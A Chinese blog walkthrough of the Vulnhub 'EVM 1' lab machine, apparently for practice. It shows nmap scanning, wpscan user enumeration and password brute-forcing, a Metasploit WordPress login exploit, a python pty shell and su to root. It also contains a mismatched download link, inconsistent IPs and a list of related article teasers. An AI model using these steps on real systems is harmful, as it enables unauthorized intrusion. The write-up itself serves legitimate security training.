Vulnhub-靶机-EVM 1

最新推荐文章于 2024-08-11 20:47:36 发布
最新推荐文章于 2024-08-11 20:47:36 发布
阅读量315 收藏 1
点赞数
分类专栏: Vulnhub-靶机 文章标签: 渗透测试 shell 靶机 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43264813/article/details/113537710
版权

Vulnhub—靶机—EVM 1

本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关

地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

文章目录

一、信息收集

【步骤一】使用nmap确定目标靶机地址,对目标靶机进行全端口扫描:
【命令】nmap -n -sC -sV -p- 192.168.43.121
在这里插入图片描述
在这里插入图片描述

【步骤二】访问80端口web页面:
在这里插入图片描述

【步骤三】对80端口进行目录枚举
在这里插入图片描述【分析】结合主页及目录枚举,确认存在wordpress系统

【步骤四】使用wpscan扫描用户
【命令】wpscan --url http://192.168.43.121/wordpress/ -eu
在这里插入图片描述
【分析】扫描发现当前版本是5.2.4 用户为c0rrupt3d_brain

【步骤五】对用户密码进行爆破
【命令】wpscan --url http://192.168.43.121/wordpress/ -U c0rrupt3d_brain -P /home/passwd.txt
在这里插入图片描述

二、漏洞利用

【步骤六】利用用户名密码结合msf的wordprss漏洞模块进行攻击
【命令】
set rhosts 192.168.40.138
set username c0rrupt3d_brain
set password 24992499
set targeturi /wordpress
run
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

【步骤七】内部信息收集
在这里插入图片描述

【分析】在home下隐藏文件中发现疑似root密码

【步骤八】使用python获取交互式shell
【命令】python -c ‘import pty;pty.spawn("/bin/bash")’
在这里插入图片描述

【步骤九】使用su切换root
在这里插入图片描述

三、Flag

【flag】

夜白君
关注
专栏目录
Vulhub系列:EVM 1
Ms08067安全实验室
11-29 536
0x00 技术点Nmap端口扫描、目录发现、漏洞探测Wpscan用户枚举、密码爆破Meterpreter shell权限提升0x01 环境搭建靶机链接: https://www.vuln...
vulnhub靶机EVM
timesleep的博客
11-30 784
拿到我们的靶机我们首先扫描并确定靶机IP 发现这个靶机为153然后使用nmap扫描 看到靶机有80端口然后先访问一下 看到只是一个apache界面使用扫描一下目录 我们发现靶机有wordpress框架,然后使用wpscan工具扫描这个框架. wpscan --url http://192.168.34.153/wordpress -e ap -e at -e u 我们看到了一个用户c...
VulnHub系列』EVM: 1-Walkthrough
ins1ght的博客
11-28 701
靶机发布日期:2019年11月2日,难度:初级。这个靶机本身没有什么难度,容易卡住的地方也就是配置靶机的网络了。PS:以后的文章可能更加偏重于思路的分享,可能不再像以前一样写的那么细节,但这不代表以后都不用心了,只能说顺应大趋势吧,该提到的点也都会提到。有什么问题可以私下交流,感谢!!!
West-Wild-v1.1靶机渗透测试
最新发布
weixin_58786230的博客
08-11 287
【代码】West-Wild-v1.1靶机渗透测试
EVM靶机
weixin_74188994的博客
05-11 811
通过VirtualBox食用。
Vulnhub:EVM 1靶机
qq_43884092的博客
04-24 154
wpscan爆破用户名和密码,/home/root3r/.root_password_ssh.txt发现root用户的密码
EVM靶机 测试
Keepb1ue的博客
03-17 3209
靶机运行环境: Oracle VM VirtualBox 靶机ip:192.168.56.103 所用工具: Nmap Wpscan Dirb AntSword … 开始测试: 我们先进行信息收集,扫描下它的端口服务 可以看到该靶机总共开放了7个端口。 发现它的ssh服务是开放的,并开放了一个http服务 试着去访问192.168.56.103,默认端口为80 在主页这里给出了提示 在这里我...
vulnhub靶场之EVM
qq_34613171的博客
02-11 312
难度:初级 这是超级友好的盒子,适合初学者 使用VirtualBox可能比使用VMware更好 http://192.168.56.103/ 扫目录发现wordpress/。 使用wpscan进行扫描 wpscan --url http://192.168.0.119/wordpress/ -e at -e ap -e u wpscan枚举(-e)在wordpress网站上安装的所有主题(at...
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub-Lampiao 靶机渗透
Majula
01-30 2245
WalkthroughDownloadDescriptionPen TestingInformation GatheringExploitationReview Download Lampião: 1 ~ VulnHub VM 镜像文件,直接选择 打开虚拟机 即可。 Description Would you like to keep hacking in your own lab? Try this brand new vulnerable machine! “Lampião 1”. Get root!
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
VulnHub-Tr0ll1.zip
01-12
VulnHub-Tr0ll1靶机学习笔记,一部分是学习笔记过程,另一部分是学习过程整理的lol.pacp\.c文档、user.txt等文档,供大家参考学习
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
EVM靶机渗透实战-vuluhub系列(八)
PANDA墨森的博客
07-07 790
这是vulnhub靶机系列文章的第八篇,本次主要知识点为:利用msf登陆wordpress后台getshell,本机信息收集的妙处 Ps:用vm环境搭建的时候会获取不到ip,可换成vutrlbox或者自行百度解决,也可以联系我(如有需要的话) 靶机下载地址:https://www.vulnhub.com/entry/evm-1,391/ 原文链接:https://www.cnblogs.com/PANDA-Mosen/p/13209803.html #001 实验环境(nat模式) 攻击机:.
EVM: 1-Walkthrough【VulnHub靶场】渗透测试实战系列2
重新启程
12-03 567
靶场地址:EVM: 1 这个靶机比较特殊的地方,不是用dhcp生成地址,必须用host网络,靶机的地址必须为192.168.56.103。 至于怎么做到,小伙伴自行脑补,有助于手臂锻炼。呵呵! 搞定上面的准备工作之后,拿出kali,先扫一下地址和端口: 用enum4linux对smb扫描了一下,没有什么特别有用的信息 就直接打开80web看看情况,扫描了一下目录,发现有word...
VulnHub 靶机学习No.1-EVM
gh0stf1re的博客
09-27 291
本篇博客的主要内容VulnHub 靶机学习No.1-EVM靶机运行说明信息收集反弹shell提权知识点总结:参考链接: VulnHub 靶机学习No.1-EVM 靶机运行说明 靶机难度: 目标: 攻击机:kali linux,ip地址:192.168.56.102 靶机EVM,IP地址:192.168.56.103 信息收集 仅开启kali 和靶机,使用nmap扫描kali所在的C段 nmap 192.168.56.102/24 扫描结果: root@kali:~# nmap 192.168.56.
vulnhub靶机EVM渗透笔记
liver100day的博客
08-02 1223
文章标题1.环境搭建2.信息收集2.1 主机发现3.漏洞利用4.提权5.总结 1.环境搭建 靶机环境搭建 攻击渗透机: kali IP地址:192.168.33.139 靶机EVM IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/evm-1,391/ 2.信息收集 2.1 主机发现 我们要进行渗透,首先得知道目标靶机的IP地址,否则将无从做起 arp-scan -l 3.漏洞利用 4.提权 5.总结 ...
EVM Instruction Set
weixin_34198583的博客
04-21 124
2019独角兽企业重金招聘Python工程师标准>>> ...
vulnhub - EVM
weixin_46164380的博客
03-27 215
EVM靶机 网段扫描:arp-scan -l 扫描靶机开启的服务 开启的服务比较多,有ssh服务、有http服务;还有三个邮件协议110、139、445; Ps:samba可以进行枚举 共享 enum4linux -S 192.168.56.103 遍历目录发现:info.php 并且还是wordpress框架 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ctK...
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。对于想要提高渗透测试技能的安全从业者来说,这是一个非常有用的学习资源。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

夜白君

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值